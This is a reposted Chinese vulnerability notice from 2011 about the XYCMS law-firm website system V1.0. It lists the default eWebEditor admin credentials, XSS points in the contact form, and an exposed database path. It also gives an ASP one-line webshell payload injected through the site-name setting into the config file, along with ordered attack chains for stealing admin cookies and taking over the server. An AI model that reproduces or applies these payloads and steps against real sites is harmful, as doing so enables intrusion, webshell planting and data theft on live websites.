XYCMS律师事务所建站系统 V1.0多处缺陷漏洞预警 -电脑资料

时间:2016-02-06 05:23:16
染雾
分享
WORD下载 PDF下载 投诉

#########################################

# XYCMS律师事务所建站系统 V1.0#

# http://down.admin5.com/asp/71909.html #

# B0mbErM@n ; 2011-2-18#

#########################################

############### eWebEditor ##############

http://127.0.0.1:99/system/xyeWebEditor/admin/login.asp

User=XY2010Pass=XY2010

##################XSS#################

http://127.0.0.1:99/online.asp

Qq:[XSS]

Mail:[XSS]

Photo:[XSS]

Contents:[XSS]

################## Eval #################

http://127.0.0.1:99/system/admin_setup.asp

WebName:<% eval request("pass")%>

http://127.0.0.1:99/inc/config.asp

##################MDB

#################

http://127.0.0.1:99/xydata/xycms.mdb

################# Hacking ################

1:eWebEditor

2:XSS+Eval

(1)标题和姓名写的真实些

(2)插入XSS获取后台路径以及cookie

(3)Eval

3:MDB+Eval

(1)MDB

(2)Eval

4:XSS+MDB+Eval

(1)MDB

(2)XSS-标题和姓名写的真实些

(3)插入XSS获取后台路径

(4)Eval

XYCMS律师事务所建站系统 V1.0多处缺陷漏洞预警 -电脑资料

手机扫码分享

Top